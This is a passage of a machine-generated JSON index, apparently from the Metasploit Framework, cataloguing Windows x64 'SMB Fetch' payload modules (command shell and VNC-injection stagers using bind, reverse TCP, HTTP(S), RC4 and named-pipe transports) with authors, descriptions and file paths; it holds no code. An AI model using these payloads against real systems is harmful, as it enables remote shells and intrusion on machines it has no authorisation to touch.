||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/bind_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/bind_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/bind_tcp_rc4": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/bind_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/bind_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/bind_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/bind_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/bind_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/bind_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/bind_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/reverse_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/reverse_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/reverse_tcp_rc4": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/reverse_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/reverse_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/reverse_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/reverse_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/reverse_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/reverse_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/reverse_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell_bind_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Inline",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell_bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell_bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell_bind_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell_reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Inline",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell_reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell_reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell_reverse_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/bind_ipv6_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/bind_ipv6_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/bind_named_pipe": {
|
||||
"name": "SMB Fetch, Windows x64 Bind Named Pipe Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/bind_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/bind_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/bind_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/bind_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/bind_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/bind_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/bind_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/bind_tcp_rc4": {
|
||||
"name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/bind_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/bind_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/bind_tcp_uuid": {
|
||||
"name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/bind_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/bind_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/reverse_http": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_http",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/reverse_http",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/reverse_http",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/reverse_http"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/reverse_https": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_https",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"hdm <x@hdm.io>",
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/reverse_https",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/reverse_https",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/reverse_https"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/reverse_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/reverse_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/reverse_tcp_rc4": {
|
||||
"name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/reverse_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/reverse_tcp_uuid": {
|
||||
"name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
